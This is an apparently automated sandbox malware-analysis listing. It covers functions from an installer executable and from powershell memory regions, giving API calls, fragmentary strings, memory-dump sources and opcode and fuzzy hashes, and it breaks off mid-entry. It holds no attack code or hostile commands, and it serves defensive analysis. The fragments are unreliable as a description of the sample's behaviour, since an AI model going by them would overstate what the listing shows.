                                                                                                                                  Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                  • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfileStringlstrcmp
                                                                                                                                  • String ID: !N~
                                                                                                                                  • API String ID: 623250636-529124213
                                                                                                                                  • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                  • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                  • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                  • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                  Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                  Strings
                                                                                                                                  • Error launching installer, xrefs: 00405C74
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                  • String ID: Error launching installer
                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                  • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                  • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                  • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                  • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                  Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                  • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                    • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                  • API String ID: 3509786178-2769509956
                                                                                                                                  • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                  • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                  • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                  • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                  Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                  • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                  • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                  • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                  • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                  • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                  • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                  Executed Functions

                                                                                                                                  Function 0317B342 Relevance: .3, Instructions: 257COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6dcc5fe8c52bfff4cbf92bb0f8ab2612420e2a41f4b54954319f7cca3070809a
                                                                                                                                  • Instruction ID: 23e095cdce825aab0bafbb5e090c4820fdf04508548cd537950ead94dfb5f14f
                                                                                                                                  • Opcode Fuzzy Hash: 6dcc5fe8c52bfff4cbf92bb0f8ab2612420e2a41f4b54954319f7cca3070809a
                                                                                                                                  • Instruction Fuzzy Hash: E0917371B006195BDB1AEBB4C8155AFB7F2EFC4704B04891DD10AAB344DF74AE068BD6
                                                                                                                                  Function 0317B350 Relevance: .3, Instructions: 252COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f634ff4c3c429b169008f43dbcbd36b2bf3355eb4b86d276140590b01e2aec1f
                                                                                                                                  • Instruction ID: 7a8d1c4dbc67b4f552abe5e1e3fd667a6b9c45aaf929774345c718bf2607f363
                                                                                                                                  • Opcode Fuzzy Hash: f634ff4c3c429b169008f43dbcbd36b2bf3355eb4b86d276140590b01e2aec1f
                                                                                                                                  • Instruction Fuzzy Hash: 63916271B006199BDB1AEBB5C8055AFB7F2EFC4704B04891DD10AAB344DF74AA068BD6
                                                                                                                                  Function 075364B0 Relevance: 17.0, Strings: 11, Instructions: 3206COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3195673054.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_7530000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$h2|j
                                                                                                                                  • API String ID: 0-3387054271
                                                                                                                                  • Opcode ID: 4d63dd0cbd0950e6522d03b1ae3567c3e677cac328a4dafcba6fcdc60f364808
                                                                                                                                  • Instruction ID: 6cfddd1aad5abf17aba40dce036d903aeba12f1b4cd3a857c63cdb3a55d12d54
                                                                                                                                  • Opcode Fuzzy Hash: 4d63dd0cbd0950e6522d03b1ae3567c3e677cac328a4dafcba6fcdc60f364808
                                                                                                                                  • Instruction Fuzzy Hash: B292E4B0B00206DFCB14DB68D950AEABBE2FF85350F14886ED9059B365DB36DC45CBA1
                                                                                                                                  Function 07532C90 Relevance: 10.7, Strings: 8, Instructions: 677COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3195673054.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_7530000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'^q$4'^q$piQj$piQj$piQj$piQj$piQj$|,Sj
                                                                                                                                  • API String ID: 0-3919967618
                                                                                                                                  • Opcode ID: 615ea6c6948784dea8c56e5089983afe75b7750e8c622efca89189ba9bed8a27
                                                                                                                                  • Instruction ID: 6c622ddfe286de2403d56576830ea08d2df598898ed0414ecb6b493312fe8aa5
                                                                                                                                  • Opcode Fuzzy Hash: 615ea6c6948784dea8c56e5089983afe75b7750e8c622efca89189ba9bed8a27
                                                                                                                                  • Instruction Fuzzy Hash: 9A3248B17043469FCB149B6DD8416EABBE6BF86210F0484BBE505CF262DB35DC45CBA1
                                                                                                                                  Function 075345B0 Relevance: 5.6, Strings: 4, Instructions: 579COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3195673054.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_7530000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                  • API String ID: 0-1420252700
                                                                                                                                  • Opcode ID: 4a57d2707448a2aebeae1c87140e5727bc8a9cc196b491ccc1552faf7d0dc4ea
                                                                                                                                  • Instruction ID: f325c2d1ef97f3974118b3721d5a1193a3a708b2f3ce88f1c6e1eaf0256674fb
                                                                                                                                  • Opcode Fuzzy Hash: 4a57d2707448a2aebeae1c87140e5727bc8a9cc196b491ccc1552faf7d0dc4ea
                                                                                                                                  • Instruction Fuzzy Hash: 681248B1B002958FCB259B6898106FABBA2BFC6251F1484BBD515CB361DF36CC45C7A2
                                                                                                                                  Function 03177288 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (bq
                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                  • Opcode ID: f3e0290cec78a9828e9bde360252eaf2dc071fdd86bcce3409d427870e379c40
                                                                                                                                  • Instruction ID: 0986448a19635ef7988aa9aa7907787106666f989ba4df497842cc05fd917f71
                                                                                                                                  • Opcode Fuzzy Hash: f3e0290cec78a9828e9bde360252eaf2dc071fdd86bcce3409d427870e379c40
                                                                                                                                  • Instruction Fuzzy Hash: 0E412834B042048FCB05DF68C568AADBBF6AF8D215F1940A9E802EB391DB35DD01CB60
                                                                                                                                  Function 0317E8F1 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: piQj
                                                                                                                                  • API String ID: 0-62548860
                                                                                                                                  • Opcode ID: 029efe292bca54c8d5a252f7932b558bf5801c97293f26f363a32455ca26fc1b
                                                                                                                                  • Instruction ID: 867c01e17eacbbfb665fe52867a6d1ea3251b4c30bc2921902a36b63e0d5cd0d
                                                                                                                                  • Opcode Fuzzy Hash: 029efe292bca54c8d5a252f7932b558bf5801c97293f26f363a32455ca26fc1b
                                                                                                                                  • Instruction Fuzzy Hash: 09318934A01205DFCB14DF68E994A9EFBF1EF89300F148569E406A7395DB34A909CBA0
                                                                                                                                  Function 0317E900 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: piQj
                                                                                                                                  • API String ID: 0-62548860
                                                                                                                                  • Opcode ID: 12539aa0727b122fc1dfd70ba79e1a6be423378a69b0a6c37e559584c38899d4
                                                                                                                                  • Instruction ID: b0e4674970d0615990b14037997c2a77622a4bb7c534b707b3176283fd3e92c7
                                                                                                                                  • Opcode Fuzzy Hash: 12539aa0727b122fc1dfd70ba79e1a6be423378a69b0a6c37e559584c38899d4
                                                                                                                                  • Instruction Fuzzy Hash: C5316974A00205CFCB14EF69D694A9EBBF2FF8C300F148569E406A7395DB34AD48CBA1
                                                                                                                                  Function 0317B258 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (&^q
                                                                                                                                  • API String ID: 0-2067289071
                                                                                                                                  • Opcode ID: 5682e7ece6eaa6bcddb59f7f44b9d3c88803810648a7676f575b83d62dce5af9
                                                                                                                                  • Instruction ID: e20e2dd4a143ddd69150a6c4781f8e3d04a9e63cdc76a145ab24498560fadfa7
                                                                                                                                  • Opcode Fuzzy Hash: 5682e7ece6eaa6bcddb59f7f44b9d3c88803810648a7676f575b83d62dce5af9
                                                                                                                                  • Instruction Fuzzy Hash: F2217A75A042588FCB14DFAEE40479EBFF5AF88320F28846AE418A7350CB759945CBA5
                                                                                                                                  Function 03172DF0 Relevance: .2, Instructions: 208COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: aaaf0c8c12b0b45ac5289419e8186656730310db50f0db8280f546a74f24732c
                                                                                                                                  • Instruction ID: ffd37d33daee7cda839a8949cd2f1430a670a167be15b7117fa716d97e1b4bae
                                                                                                                                  • Opcode Fuzzy Hash: aaaf0c8c12b0b45ac5289419e8186656730310db50f0db8280f546a74f24732c
                                                                                                                                  • Instruction Fuzzy Hash: B7915A74A002058FCB15CF59C4949AEFBB1FF48310B288999D955AB3A5C736FC92CB90
                                                                                                                                  Function 0317BD88 Relevance: .2, Instructions: 155COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 887fd14da4f00834c87812e5e97f4881a434d38ed4da8cee605c621d1d6f0d62
                                                                                                                                  • Instruction ID: 7a1758816335667d87087ed6ba7ebe14822d6c8bace8710d38ce759d146b0b8e
                                                                                                                                  • Opcode Fuzzy Hash: 887fd14da4f00834c87812e5e97f4881a434d38ed4da8cee605c621d1d6f0d62
                                                                                                                                  • Instruction Fuzzy Hash: B3610571E01208DFCB14DFA9D58469DFBF2EF88310F28816AE809AB354DB749D85CB50
                                                                                                                                  Function 031779E8 Relevance: .2, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f5e3e58b9848c5f95646c5be4c833adc15aca5eddc2b218052cf04abde9c97e9
                                                                                                                                  • Instruction ID: c577d9a70090910b634ffa28992361d3bebe5336f0e00292c96f650d82f01c85
                                                                                                                                  • Opcode Fuzzy Hash: f5e3e58b9848c5f95646c5be4c833adc15aca5eddc2b218052cf04abde9c97e9
                                                                                                                                  • Instruction Fuzzy Hash: 6A51AE343042159FD704DB79D844A3ABBEAFBC8314F1D89A9E50ACB396DB36DD018B90
                                                                                                                                  Function 0317BD79 Relevance: .2, Instructions: 150COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4ab09b039f5665172fa0b37cb5e4b50fc7fdb645d4f8008e451a6c6e8229f25d
                                                                                                                                  • Instruction ID: d4dc85108ad69debe7d99a8c73be2611060fa824b9262c39a3851db52d512630
                                                                                                                                  • Opcode Fuzzy Hash: 4ab09b039f5665172fa0b37cb5e4b50fc7fdb645d4f8008e451a6c6e8229f25d
                                                                                                                                  • Instruction Fuzzy Hash: 1551F471E05208DFCB54DFA9D584A9DFBF2EF88310F28806AE809AB354DB749D45CB50
                                                                                                                                  Function 0317E6E0 Relevance: .1, Instructions: 137COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 38aa369a83cc9951650dc1c37bf338481d64c854f3eabb347a201ca5168532ad
                                                                                                                                  • Instruction ID: 47a192d4b219865c023de30a366f1ffdd74bfe9fc028e5ff9a65b2941fde17e2
                                                                                                                                  • Opcode Fuzzy Hash: 38aa369a83cc9951650dc1c37bf338481d64c854f3eabb347a201ca5168532ad
                                                                                                                                  • Instruction Fuzzy Hash: D5512B347402058FCB10DB6CD99496ABBF6FF8C305B1984A9E449DF366EB34DC018BA1
                                                                                                                                  Function 0317E6F0 Relevance: .1, Instructions: 130COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e82e0c3ef7a9aab0ba4da3748460d02e65e023e06e416b63247b5b9137606419
                                                                                                                                  • Instruction ID: c0897004731895bd1bf78d2ff3f72fe84b3fc2988dd2141c9096a390217a1a1e
                                                                                                                                  • Opcode Fuzzy Hash: e82e0c3ef7a9aab0ba4da3748460d02e65e023e06e416b63247b5b9137606419
                                                                                                                                  • Instruction Fuzzy Hash: 67410A347402058FCB10DB6DD69496ABBF6FF8C305B1984A9F449DB365EB74EC018BA0
                                                                                                                                  Function 07534594 Relevance: .1, Instructions: 122COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3195673054.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_7530000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 598f750a24b87fd23011296fa7f8273bed1478b0979963aaafdb8c6c5a82b40b
                                                                                                                                  • Instruction ID: e1951f7265c171796f7f1323b70aaec15fb50947e3c3fbab909f1c254b85c42f
                                                                                                                                  • Opcode Fuzzy Hash: 598f750a24b87fd23011296fa7f8273bed1478b0979963aaafdb8c6c5a82b40b
                                                                                                                                  • Instruction Fuzzy Hash: 26412AF4A00281DFCF218F68D941AFA7FE6BB82245F4A85A7C8049F271C735C845C7A1
                                                                                                                                  Function 0317BFA8 Relevance: .1, Instructions: 115COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 54305578d20313c30cb07a5d7da67afd6e389e775844b0d23007c786ceaa41a3
                                                                                                                                  • Instruction ID: cf7c34ec1a2d7e89d1307513d2e4dd8894b01b06bba47c004e0c850a772a03b1
                                                                                                                                  • Opcode Fuzzy Hash: 54305578d20313c30cb07a5d7da67afd6e389e775844b0d23007c786ceaa41a3
                                                                                                                                  • Instruction Fuzzy Hash: 0341D5719093888FCB21DFA9D45469ABFF0EF49320F28849ED059DB2A2C774A845CB61
                                                                                                                                  Function 03172F00 Relevance: .1, Instructions: 107COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000010.00000002.3190704279.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_16_2_3170000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8166f2810e90c95b197af196d43ea7bace8fc7f8a7a0b4faea012020ef7c9743
                                                                                                                                  • Instruction ID: 58e91c447eae2a63bee3f7c002f53b8d009037d5f439a773215dd9b6d85b6725
                                                                                                                                  • Opcode Fuzzy Hash: 8166f2810e90c95b197af196d43ea7bace8fc7f8a7a0b4faea012020ef7c9743
                                                                                                                                  • Instruction Fuzzy Hash: FC4136B4A005058FCB09CF48C198EAAFBB1FF48310B298599D855AB365C732FC91CFA0
                                                                                                                                  Function 0317C650 Relevance: .1, Instructions: 101COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
